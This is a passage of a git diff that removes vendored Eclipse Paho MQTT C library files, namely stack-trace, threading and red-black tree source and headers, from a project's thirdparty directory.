-pending_writes* SocketBuffer_updateWrite(int socket, char* topic, char* payload);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/StackTrace.c b/thirdparty/paho.mqtt.c/src/StackTrace.c
deleted file mode 100644
index dd55f71..0000000
--- a/thirdparty/paho.mqtt.c/src/StackTrace.c
+++ /dev/null
@@ -1,207 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#include "StackTrace.h"
-#include "Log.h"
-#include "LinkedList.h"
-
-#include "Clients.h"
-#include "Thread.h"
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(WIN32) || defined(WIN64)
-#define snprintf _snprintf
-#endif
-
-/*BE
-def STACKENTRY
-{
-	n32 ptr STRING open "name"
-	n32 dec "line"
-}
-
-defList(STACKENTRY)
-BE*/
-
-#define MAX_STACK_DEPTH 50
-#define MAX_FUNCTION_NAME_LENGTH 30
-#define MAX_THREADS 255
-
-typedef struct
-{
-	thread_id_type threadid;
-	char name[MAX_FUNCTION_NAME_LENGTH];
-	int line;
-} stackEntry;
-
-typedef struct
-{
-	thread_id_type id;
-	int maxdepth;
-	int current_depth;
-	stackEntry callstack[MAX_STACK_DEPTH];
-} threadEntry;
-
-#include "StackTrace.h"
-
-static int thread_count = 0;
-static threadEntry threads[MAX_THREADS];
-static threadEntry *cur_thread = NULL;
-
-#if defined(WIN32) || defined(WIN64)
-mutex_type stack_mutex;
-#else
-static pthread_mutex_t stack_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type stack_mutex = &stack_mutex_store;
-#endif
-
-
-int setStack(int create);
-
-
-int setStack(int create)
-{
-	int i = -1;
-	thread_id_type curid = Thread_getid();
-
-	cur_thread = NULL;
-	for (i = 0; i < MAX_THREADS && i < thread_count; ++i)
-	{
-		if (threads[i].id == curid)
-		{
-			cur_thread = &threads[i];
-			break;
-		}
-	}
-
-	if (cur_thread == NULL && create && thread_count < MAX_THREADS)
-	{
-		cur_thread = &threads[thread_count];
-		cur_thread->id = curid;
-		cur_thread->maxdepth = 0;
-		cur_thread->current_depth = 0;
-		++thread_count;
-	}
-	return cur_thread != NULL; /* good == 1 */
-}
-
-void StackTrace_entry(const char* name, int line, enum LOG_LEVELS trace_level)
-{
-	Thread_lock_mutex(stack_mutex);
-	if (!setStack(1))
-		goto exit;
-	if (trace_level != -1)
-		Log_stackTrace(trace_level, 9, (int)cur_thread->id, cur_thread->current_depth, name, line, NULL);
-	strncpy(cur_thread->callstack[cur_thread->current_depth].name, name, sizeof(cur_thread->callstack[0].name)-1);
-	cur_thread->callstack[(cur_thread->current_depth)++].line = line;
-	if (cur_thread->current_depth > cur_thread->maxdepth)
-		cur_thread->maxdepth = cur_thread->current_depth;
-	if (cur_thread->current_depth >= MAX_STACK_DEPTH)
-		Log(LOG_FATAL, -1, "Max stack depth exceeded");
-exit:
-	Thread_unlock_mutex(stack_mutex);
-}
-
-
-void StackTrace_exit(const char* name, int line, void* rc, enum LOG_LEVELS trace_level)
-{
-	Thread_lock_mutex(stack_mutex);
-	if (!setStack(0))
-		goto exit;
-	if (--(cur_thread->current_depth) < 0)
-		Log(LOG_FATAL, -1, "Minimum stack depth exceeded for thread %lu", cur_thread->id);
-	if (strncmp(cur_thread->callstack[cur_thread->current_depth].name, name, sizeof(cur_thread->callstack[0].name)-1) != 0)
-		Log(LOG_FATAL, -1, "Stack mismatch. Entry:%s Exit:%s\n", cur_thread->callstack[cur_thread->current_depth].name, name);
-	if (trace_level != -1)
-	{
-		if (rc == NULL)
-			Log_stackTrace(trace_level, 10, (int)cur_thread->id, cur_thread->current_depth, name, line, NULL);
-		else
-			Log_stackTrace(trace_level, 11, (int)cur_thread->id, cur_thread->current_depth, name, line, (int*)rc);
-	}
-exit:
-	Thread_unlock_mutex(stack_mutex);
-}
-
-
-void StackTrace_printStack(FILE* dest)
-{
-	FILE* file = stdout;
-	int t = 0;
-
-	if (dest)
-		file = dest;
-	for (t = 0; t < thread_count; ++t)
-	{
-		threadEntry *cur_thread = &threads[t];
-
-		if (cur_thread->id > 0)
-		{
-			int i = cur_thread->current_depth - 1;
-
-			fprintf(file, "=========== Start of stack trace for thread %lu ==========\n", (unsigned long)cur_thread->id);
-			if (i >= 0)
-			{
-				fprintf(file, "%s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-				while (--i >= 0)
-					fprintf(file, "   at %s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-			}
-			fprintf(file, "=========== End of stack trace for thread %lu ==========\n\n", (unsigned long)cur_thread->id);
-		}
-	}
-	if (file != stdout && file != stderr && file != NULL)
-		fclose(file);
-}
-
-
-char* StackTrace_get(thread_id_type threadid)
-{
-	int bufsize = 256;
-	char* buf = NULL;
-	int t = 0;
-
-	if ((buf = malloc(bufsize)) == NULL)
-		goto exit;
-	buf[0] = '\0';
-	for (t = 0; t < thread_count; ++t)
-	{
-		threadEntry *cur_thread = &threads[t];
-
-		if (cur_thread->id == threadid)
-		{
-			int i = cur_thread->current_depth - 1;
-			int curpos = 0;
-
-			if (i >= 0)
-			{
-				curpos += snprintf(&buf[curpos], bufsize - curpos -1,
-						"%s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-				while (--i >= 0)
-					curpos += snprintf(&buf[curpos], bufsize - curpos -1,
-							"   at %s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-				if (buf[--curpos] == '\n')
-					buf[curpos] = '\0';
-			}
-			break;
-		}
-	}
-exit:
-	return buf;
-}
-
diff --git a/thirdparty/paho.mqtt.c/src/StackTrace.h b/thirdparty/paho.mqtt.c/src/StackTrace.h
deleted file mode 100644
index f4ebba2..0000000
--- a/thirdparty/paho.mqtt.c/src/StackTrace.h
+++ /dev/null
@@ -1,71 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#ifndef STACKTRACE_H_
-#define STACKTRACE_H_
-
-#include <stdio.h>
-#include "Log.h"
-#include "Thread.h"
-
-#if defined(NOSTACKTRACE)
-#define FUNC_ENTRY
-#define FUNC_ENTRY_NOLOG
-#define FUNC_ENTRY_MED
-#define FUNC_ENTRY_MAX
-#define FUNC_EXIT
-#define FUNC_EXIT_NOLOG
-#define FUNC_EXIT_MED
-#define FUNC_EXIT_MAX
-#define FUNC_EXIT_RC(x)
-#define FUNC_EXIT_MED_RC(x)
-#define FUNC_EXIT_MAX_RC(x)
-#else
-#if defined(WIN32) || defined(WIN64)
-#define inline __inline
-#define FUNC_ENTRY StackTrace_entry(__FUNCTION__, __LINE__, TRACE_MINIMUM)
-#define FUNC_ENTRY_NOLOG StackTrace_entry(__FUNCTION__, __LINE__, -1)
-#define FUNC_ENTRY_MED StackTrace_entry(__FUNCTION__, __LINE__, TRACE_MEDIUM)
-#define FUNC_ENTRY_MAX StackTrace_entry(__FUNCTION__, __LINE__, TRACE_MAXIMUM)
-#define FUNC_EXIT StackTrace_exit(__FUNCTION__, __LINE__, NULL, TRACE_MINIMUM)
-#define FUNC_EXIT_NOLOG StackTrace_exit(__FUNCTION__, __LINE__, -1)
-#define FUNC_EXIT_MED StackTrace_exit(__FUNCTION__, __LINE__, NULL, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX StackTrace_exit(__FUNCTION__, __LINE__, NULL, TRACE_MAXIMUM)
-#define FUNC_EXIT_RC(x) StackTrace_exit(__FUNCTION__, __LINE__, &x, TRACE_MINIMUM)
-#define FUNC_EXIT_MED_RC(x) StackTrace_exit(__FUNCTION__, __LINE__, &x, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX_RC(x) StackTrace_exit(__FUNCTION__, __LINE__, &x, TRACE_MAXIMUM)
-#else
-#define FUNC_ENTRY StackTrace_entry(__func__, __LINE__, TRACE_MINIMUM)
-#define FUNC_ENTRY_NOLOG StackTrace_entry(__func__, __LINE__, -1)
-#define FUNC_ENTRY_MED StackTrace_entry(__func__, __LINE__, TRACE_MEDIUM)
-#define FUNC_ENTRY_MAX StackTrace_entry(__func__, __LINE__, TRACE_MAXIMUM)
-#define FUNC_EXIT StackTrace_exit(__func__, __LINE__, NULL, TRACE_MINIMUM)
-#define FUNC_EXIT_NOLOG StackTrace_exit(__func__, __LINE__, NULL, -1)
-#define FUNC_EXIT_MED StackTrace_exit(__func__, __LINE__, NULL, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX StackTrace_exit(__func__, __LINE__, NULL, TRACE_MAXIMUM)
-#define FUNC_EXIT_RC(x) StackTrace_exit(__func__, __LINE__, &x, TRACE_MINIMUM)
-#define FUNC_EXIT_MED_RC(x) StackTrace_exit(__func__, __LINE__, &x, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX_RC(x) StackTrace_exit(__func__, __LINE__, &x, TRACE_MAXIMUM)
-#endif
-#endif
-
-void StackTrace_entry(const char* name, int line, enum LOG_LEVELS trace);
-void StackTrace_exit(const char* name, int line, void* return_value, enum LOG_LEVELS trace);
-
-void StackTrace_printStack(FILE* dest);
-char* StackTrace_get(thread_id_type);
-
-#endif /* STACKTRACE_H_ */
diff --git a/thirdparty/paho.mqtt.c/src/Thread.c b/thirdparty/paho.mqtt.c/src/Thread.c
deleted file mode 100644
index 37aaa58..0000000
--- a/thirdparty/paho.mqtt.c/src/Thread.c
+++ /dev/null
@@ -1,462 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation
- *    Ian Craggs, Allan Stockdill-Mander - async client updates
- *    Ian Craggs - bug #415042 - start Linux thread as disconnected
- *    Ian Craggs - fix for bug #420851
- *    Ian Craggs - change MacOS semaphore implementation
- *******************************************************************************/
-
-/**
- * @file
- * \brief Threading related functions
- *
- * Used to create platform independent threading functions
- */
-
-
-#include "Thread.h"
-#if defined(THREAD_UNIT_TESTS)
-#define NOSTACKTRACE
-#endif
-#include "StackTrace.h"
-
-#undef malloc
-#undef realloc
-#undef free
-
-#if !defined(WIN32) && !defined(WIN64)
-#include <errno.h>
-#include <unistd.h>
-#include <sys/time.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <sys/stat.h>
-#include <limits.h>
-#endif
-#include <stdlib.h>
-
-#include "OsWrapper.h"
-
-/**
- * Start a new thread
- * @param fn the function to run, must be of the correct signature
- * @param parameter pointer to the function parameter, can be NULL
- * @return the new thread
- */
-thread_type Thread_start(thread_fn fn, void* parameter)
-{
-#if defined(WIN32) || defined(WIN64)
-	thread_type thread = NULL;
-#else
-	thread_type thread = 0;
-	pthread_attr_t attr;
-#endif
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	thread = CreateThread(NULL, 0, fn, parameter, 0, NULL);
-#else
-	pthread_attr_init(&attr);
-	pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
-	if (pthread_create(&thread, &attr, fn, parameter) != 0)
-		thread = 0;
-	pthread_attr_destroy(&attr);
-#endif
-	FUNC_EXIT;
-	return thread;
-}
-
-
-/**
- * Create a new mutex
- * @return the new mutex
- */
-mutex_type Thread_create_mutex(void)
-{
-	mutex_type mutex = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		mutex = CreateMutex(NULL, 0, NULL);
-		if (mutex == NULL)
-			rc = GetLastError();
-	#else
-		mutex = malloc(sizeof(pthread_mutex_t));
-		rc = pthread_mutex_init(mutex, NULL);
-	#endif
-	FUNC_EXIT_RC(rc);
-	return mutex;
-}
-
-
-/**
- * Lock a mutex which has alrea
- * @return completion code, 0 is success
- */
-int Thread_lock_mutex(mutex_type mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points as the stack log uses mutexes - recursion beckons */
-	#if defined(WIN32) || defined(WIN64)
-		/* WaitForSingleObject returns WAIT_OBJECT_0 (0), on success */
-		rc = WaitForSingleObject(mutex, INFINITE);
-	#else
-		rc = pthread_mutex_lock(mutex);
-	#endif
-
-	return rc;
-}
-
-
-/**
- * Unlock a mutex which has already been locked
- * @param mutex the mutex
- * @return completion code, 0 is success
- */
-int Thread_unlock_mutex(mutex_type mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points as the stack log uses mutexes - recursion beckons */
-	#if defined(WIN32) || defined(WIN64)
-		/* if ReleaseMutex fails, the return value is 0 */
-		if (ReleaseMutex(mutex) == 0)
-			rc = GetLastError();
-		else
-			rc = 0;
-	#else
-		rc = pthread_mutex_unlock(mutex);
-	#endif
-
-	return rc;
-}
-
-
-/**
- * Destroy a mutex which has already been created
- * @param mutex the mutex
- */
-void Thread_destroy_mutex(mutex_type mutex)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		rc = CloseHandle(mutex);
-	#else
-		rc = pthread_mutex_destroy(mutex);
-		free(mutex);
-	#endif
-	FUNC_EXIT_RC(rc);
-}
-
-
-/**
- * Get the thread id of the thread from which this function is called
- * @return thread id, type varying according to OS
- */
-thread_id_type Thread_getid(void)
-{
-	#if defined(WIN32) || defined(WIN64)
-		return GetCurrentThreadId();
-	#else
-		return pthread_self();
-	#endif
-}
-
-
-/**
- * Create a new semaphore
- * @return the new condition variable
- */
-sem_type Thread_create_sem(void)
-{
-	sem_type sem = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		sem = CreateEvent(
-		        NULL,               /* default security attributes */
-		        FALSE,              /* manual-reset event? */
-		        FALSE,              /* initial state is nonsignaled */
-		        NULL                /* object name */
-		        );
-	#elif defined(OSX)
-		sem = dispatch_semaphore_create(0L);
-		rc = (sem == NULL) ? -1 : 0;
-	#else
-		sem = malloc(sizeof(sem_t));
-		rc = sem_init(sem, 0, 0);
-	#endif
-	FUNC_EXIT_RC(rc);
-	return sem;
-}
-
-
-/**
- * Wait for a semaphore to be posted, or timeout.
- * @param sem the semaphore
- * @param timeout the maximum time to wait, in milliseconds
- * @return completion code
- */
-int Thread_wait_sem(sem_type sem, int timeout)
-{
-/* sem_timedwait is the obvious call to use, but seemed not to work on the Viper,
- * so I've used trywait in a loop instead. Ian Craggs 23/7/2010
- */
-	int rc = -1;
-#if !defined(WIN32) && !defined(WIN64) && !defined(OSX)
-#define USE_TRYWAIT
-#if defined(USE_TRYWAIT)
-	int i = 0;
-	int interval = 10000; /* 10000 microseconds: 10 milliseconds */
-	int count = (1000 * timeout) / interval; /* how many intervals in timeout period */
-#else
-	struct timespec ts;
-#endif
-#endif
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		rc = WaitForSingleObject(sem, timeout < 0 ? 0 : timeout);
-  #elif defined(OSX)
-		rc = (int)dispatch_semaphore_wait(sem, dispatch_time(DISPATCH_TIME_NOW, (int64_t)timeout*1000000L));
-	#elif defined(USE_TRYWAIT)
-		while (++i < count && (rc = sem_trywait(sem)) != 0)
-		{
-			if (rc == -1 && ((rc = errno) != EAGAIN))
-			{
-				rc = 0;
-				break;
-			}
-			usleep(interval); /* microseconds - .1 of a second */
-		}
-	#else
-		if (clock_gettime(CLOCK_REALTIME, &ts) != -1)
-		{
-			ts.tv_sec += timeout;
-			rc = sem_timedwait(sem, &ts);
-		}
-	#endif
-
- 	FUNC_EXIT_RC(rc);
- 	return rc;
-}
-
-
-/**
- * Check to see if a semaphore has been posted, without waiting.
- * @param sem the semaphore
- * @return 0 (false) or 1 (true)
- */
-int Thread_check_sem(sem_type sem)
-{
-#if defined(WIN32) || defined(WIN64)
-	return WaitForSingleObject(sem, 0) == WAIT_OBJECT_0;
-#elif defined(OSX)
-  return dispatch_semaphore_wait(sem, DISPATCH_TIME_NOW) == 0;
-#else
-	int semval = -1;
-	sem_getvalue(sem, &semval);
-	return semval > 0;
-#endif
-}
-
-
-/**
- * Post a semaphore
- * @param sem the semaphore
- * @return completion code
- */
-int Thread_post_sem(sem_type sem)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		if (SetEvent(sem) == 0)
-			rc = GetLastError();
-	#elif defined(OSX)
-		rc = (int)dispatch_semaphore_signal(sem);
-	#else
-		if (sem_post(sem) == -1)
-			rc = errno;
-	#endif
-
- 	FUNC_EXIT_RC(rc);
-  return rc;
-}
-
-
-/**
- * Destroy a semaphore which has already been created
- * @param sem the semaphore
- */
-int Thread_destroy_sem(sem_type sem)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		rc = CloseHandle(sem);
-  #elif defined(OSX)
-	  dispatch_release(sem);
-	#else
-		rc = sem_destroy(sem);
-		free(sem);
-	#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if !defined(WIN32) && !defined(WIN64)
-/**
- * Create a new condition variable
- * @return the condition variable struct
- */
-cond_type Thread_create_cond(void)
-{
-	cond_type condvar = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	condvar = malloc(sizeof(cond_type_struct));
-	rc = pthread_cond_init(&condvar->cond, NULL);
-	rc = pthread_mutex_init(&condvar->mutex, NULL);
-
-	FUNC_EXIT_RC(rc);
-	return condvar;
-}
-
-/**
- * Signal a condition variable
- * @return completion code
- */
-int Thread_signal_cond(cond_type condvar)
-{
-	int rc = 0;
-
-	pthread_mutex_lock(&condvar->mutex);
-	rc = pthread_cond_signal(&condvar->cond);
-	pthread_mutex_unlock(&condvar->mutex);
-
-	return rc;
-}
-
-/**
- * Wait with a timeout (seconds) for condition variable
- * @return completion code
- */
-int Thread_wait_cond(cond_type condvar, int timeout)
-{
-	FUNC_ENTRY;
-	int rc = 0;
-	struct timespec cond_timeout;
-	struct timeval cur_time;
-
-	gettimeofday(&cur_time, NULL);
-
-	cond_timeout.tv_sec = cur_time.tv_sec + timeout;
-	cond_timeout.tv_nsec = cur_time.tv_usec * 1000;
-
-	pthread_mutex_lock(&condvar->mutex);
-	rc = pthread_cond_timedwait(&condvar->cond, &condvar->mutex, &cond_timeout);
-	pthread_mutex_unlock(&condvar->mutex);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/**
- * Destroy a condition variable
- * @return completion code
- */
-int Thread_destroy_cond(cond_type condvar)
-{
-	int rc = 0;
-
-	rc = pthread_mutex_destroy(&condvar->mutex);
-	rc = pthread_cond_destroy(&condvar->cond);
-	free(condvar);
-
-	return rc;
-}
-#endif
-
-
-#if defined(THREAD_UNIT_TESTS)
-
-#include <stdio.h>
-
-thread_return_type secondary(void* n)
-{
-	int rc = 0;
-
-	/*
-	cond_type cond = n;
-
-	printf("Secondary thread about to wait\n");
-	rc = Thread_wait_cond(cond);
-	printf("Secondary thread returned from wait %d\n", rc);*/
-
-	sem_type sem = n;
-
-	printf("Secondary thread about to wait\n");
-	rc = Thread_wait_sem(sem);
-	printf("Secondary thread returned from wait %d\n", rc);
-
-	printf("Secondary thread about to wait\n");
-	rc = Thread_wait_sem(sem);
-	printf("Secondary thread returned from wait %d\n", rc);
-	printf("Secondary check sem %d\n", Thread_check_sem(sem));
-
-	return 0;
-}
-
-
-int main(int argc, char *argv[])
-{
-	int rc = 0;
-
-	sem_type sem = Thread_create_sem();
-
-	printf("check sem %d\n", Thread_check_sem(sem));
-
-	printf("post secondary\n");
-	rc = Thread_post_sem(sem);
-	printf("posted secondary %d\n", rc);
-
-	printf("check sem %d\n", Thread_check_sem(sem));
-
-	printf("Starting secondary thread\n");
-	Thread_start(secondary, (void*)sem);
-
-	sleep(3);
-	printf("check sem %d\n", Thread_check_sem(sem));
-
-	printf("post secondary\n");
-	rc = Thread_post_sem(sem);
-	printf("posted secondary %d\n", rc);
-
-	sleep(3);
-
-	printf("Main thread ending\n");
-}
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Thread.h b/thirdparty/paho.mqtt.c/src/Thread.h
deleted file mode 100644
index 995e221..0000000
--- a/thirdparty/paho.mqtt.c/src/Thread.h
+++ /dev/null
@@ -1,73 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation
- *    Ian Craggs, Allan Stockdill-Mander - async client updates
- *    Ian Craggs - fix for bug #420851
- *    Ian Craggs - change MacOS semaphore implementation
- *******************************************************************************/
-#include "MQTTClient.h"
-
-#if !defined(THREAD_H)
-#define THREAD_H
-
-#if defined(WIN32) || defined(WIN64)
-	#include <windows.h>
-	#define thread_type HANDLE
-	#define thread_id_type DWORD
-	#define thread_return_type DWORD
-	#define thread_fn LPTHREAD_START_ROUTINE
-	#define mutex_type HANDLE
-	#define cond_type HANDLE
-	#define sem_type HANDLE
-#else
-	#include <pthread.h>
-
-	#define thread_type pthread_t
-	#define thread_id_type pthread_t
-	#define thread_return_type void*
-	typedef thread_return_type (*thread_fn)(void*);
-	#define mutex_type pthread_mutex_t*
-	typedef struct { pthread_cond_t cond; pthread_mutex_t mutex; } cond_type_struct;
-	typedef cond_type_struct *cond_type;
-	#if defined(OSX)
-	  #include <dispatch/dispatch.h>
-	  typedef dispatch_semaphore_t sem_type;
-	#else
-	  #include <semaphore.h>
-	  typedef sem_t *sem_type;
-	#endif
-
-	cond_type Thread_create_cond(void);
-	int Thread_signal_cond(cond_type);
-	int Thread_wait_cond(cond_type condvar, int timeout);
-	int Thread_destroy_cond(cond_type);
-#endif
-
-DLLExport thread_type Thread_start(thread_fn, void*);
-
-DLLExport mutex_type Thread_create_mutex();
-DLLExport int Thread_lock_mutex(mutex_type);
-DLLExport int Thread_unlock_mutex(mutex_type);
-void Thread_destroy_mutex(mutex_type);
-
-DLLExport thread_id_type Thread_getid();
-
-sem_type Thread_create_sem(void);
-int Thread_wait_sem(sem_type sem, int timeout);
-int Thread_check_sem(sem_type sem);
-int Thread_post_sem(sem_type sem);
-int Thread_destroy_sem(sem_type sem);
-
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Tree.c b/thirdparty/paho.mqtt.c/src/Tree.c
deleted file mode 100644
index 13134d6..0000000
--- a/thirdparty/paho.mqtt.c/src/Tree.c
+++ /dev/null
@@ -1,724 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *******************************************************************************/
-
-/** @file
- * \brief functions which apply to tree structures.
- *
- * These trees can hold data of any sort, pointed to by the content pointer of the
- * Node structure.
- * */
-
-#define NO_HEAP_TRACKING 1
-
-#include "Tree.h"
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-#include "Heap.h"
-
-
-int isRed(Node* aNode);
-int isBlack(Node* aNode);
-int TreeWalk(Node* curnode, int depth);
-int TreeMaxDepth(Tree *aTree);
-void TreeRotate(Tree* aTree, Node* curnode, int direction, int index);
-Node* TreeBAASub(Tree* aTree, Node* curnode, int which, int index);
-void TreeBalanceAfterAdd(Tree* aTree, Node* curnode, int index);
-void* TreeAddByIndex(Tree* aTree, void* content, size_t size, int index);
-Node* TreeFindIndex1(Tree* aTree, void* key, int index, int value);
-Node* TreeFindContentIndex(Tree* aTree, void* key, int index);
-Node* TreeMinimum(Node* curnode);
-Node* TreeSuccessor(Node* curnode);
-Node* TreeNextElementIndex(Tree* aTree, Node* curnode, int index);
-Node* TreeBARSub(Tree* aTree, Node* curnode, int which, int index);
-void TreeBalanceAfterRemove(Tree* aTree, Node* curnode, int index);
-void* TreeRemoveIndex(Tree* aTree, void* content, int index);
-
-
-void TreeInitializeNoMalloc(Tree* aTree, int(*compare)(void*, void*, int))
-{
-	memset(aTree, '\0', sizeof(Tree));
-	aTree->heap_tracking = 1;
-	aTree->index[0].compare = compare;
-	aTree->indexes = 1;
-}
-
-/**
- * Allocates and initializes a new tree structure.
- * @return a pointer to the new tree structure
- */
-Tree* TreeInitialize(int(*compare)(void*, void*, int))
-{
-#if defined(UNIT_TESTS)
-	Tree* newt = malloc(sizeof(Tree));
-#else
-	Tree* newt = mymalloc(__FILE__, __LINE__, sizeof(Tree));
-#endif
-	TreeInitializeNoMalloc(newt, compare);
-	return newt;
-}
-
-
-void TreeAddIndex(Tree* aTree, int(*compare)(void*, void*, int))
-{
-	aTree->index[aTree->indexes].compare = compare;
-	++(aTree->indexes);
-}
-
-
-void TreeFree(Tree* aTree)
-{
-#if defined(UNIT_TESTS)
-	free(aTree);
-#else
-	(aTree->heap_tracking) ? myfree(__FILE__, __LINE__, aTree) : free(aTree);
-#endif
-}
-
-
-#define LEFT 0
-#define RIGHT 1
-#if !defined(max)
-#define max(a, b) (a > b) ? a : b;
-#endif
-
-
-
-int isRed(Node* aNode)
-{
-	return (aNode != NULL) && (aNode->red);
-}
-
-
-int isBlack(Node* aNode)
-{
-	return (aNode == NULL) || (aNode->red == 0);
-}
-
-
-int TreeWalk(Node* curnode, int depth)
-{
-	if (curnode)
-	{
-		int left = TreeWalk(curnode->child[LEFT], depth+1);
-		int right = TreeWalk(curnode->child[RIGHT], depth+1);
-		depth = max(left, right);
-		if (curnode->red)
-		{
-			/*if (isRed(curnode->child[LEFT]) || isRed(curnode->child[RIGHT]))
-			{
-				printf("red/black tree violation %p\n", curnode->content);
-				exit(-99);
-			}*/;
-		}
-	}
-	return depth;
-}
-
-
-int TreeMaxDepth(Tree *aTree)
-{
-	int rc = TreeWalk(aTree->index[0].root, 0);
-	/*if (aTree->root->red)
-	{
-		printf("root node should not be red %p\n", aTree->root->content);
-		exit(-99);
-	}*/
-	return rc;
-}
-
-
-void TreeRotate(Tree* aTree, Node* curnode, int direction, int index)
-{
-	Node* other = curnode->child[!direction];
-
-	curnode->child[!direction] = other->child[direction];
-	if (other->child[direction] != NULL)
-		other->child[direction]->parent = curnode;
-	other->parent = curnode->parent;
-	if (curnode->parent == NULL)
-		aTree->index[index].root = other;
-	else if (curnode == curnode->parent->child[direction])
-		curnode->parent->child[direction] = other;
-	else
-		curnode->parent->child[!direction] = other;
-	other->child[direction] = curnode;
-	curnode->parent = other;
-}
-
-
-Node* TreeBAASub(Tree* aTree, Node* curnode, int which, int index)
-{
-	Node* uncle = curnode->parent->parent->child[which];
-
-	if (isRed(uncle))
-	{
-		curnode->parent->red = uncle->red = 0;
-		curnode = curnode->parent->parent;
-		curnode->red = 1;
-	}
-	else
-	{
-		if (curnode == curnode->parent->child[which])
-		{
-			curnode = curnode->parent;
-			TreeRotate(aTree, curnode, !which, index);
-		}
-		curnode->parent->red = 0;
-		curnode->parent->parent->red = 1;
-		TreeRotate(aTree, curnode->parent->parent, which, index);
-	}
-	return curnode;
-}
-
-
-void TreeBalanceAfterAdd(Tree* aTree, Node* curnode, int index)
-{
-	while (curnode && isRed(curnode->parent) && curnode->parent->parent)
-	{
-		if (curnode->parent == curnode->parent->parent->child[LEFT])
-			curnode = TreeBAASub(aTree, curnode, RIGHT, index);
-		else
-			curnode = TreeBAASub(aTree, curnode, LEFT, index);
-  }
-  aTree->index[index].root->red = 0;
-}
-
-
-/**
- * Add an item to a tree
- * @param aTree the list to which the item is to be added
- * @param content the list item content itself
- * @param size the size of the element
- */
-void* TreeAddByIndex(Tree* aTree, void* content, size_t size, int index)
-{
-	Node* curparent = NULL;
-	Node* curnode = aTree->index[index].root;
-	Node* newel = NULL;
-	int left = 0;
-	int result = 1;
-	void* rc = NULL;
-
-	while (curnode)
-	{
-		result = aTree->index[index].compare(curnode->content, content, 1);
-		left = (result > 0);
-		if (result == 0)
-			break;
-		else
-		{
-			curparent = curnode;
-			curnode = curnode->child[left];
-		}
-	}
-	
-	if (result == 0)
-	{
-		if (aTree->allow_duplicates)
-			exit(-99);
-		{
-			newel = curnode;
-			rc = newel->content;
-			if (index == 0)
-				aTree->size += (size - curnode->size);
-		}
-	}
-	else
-	{
-		#if defined(UNIT_TESTS)
-			newel = malloc(sizeof(Node));
-		#else
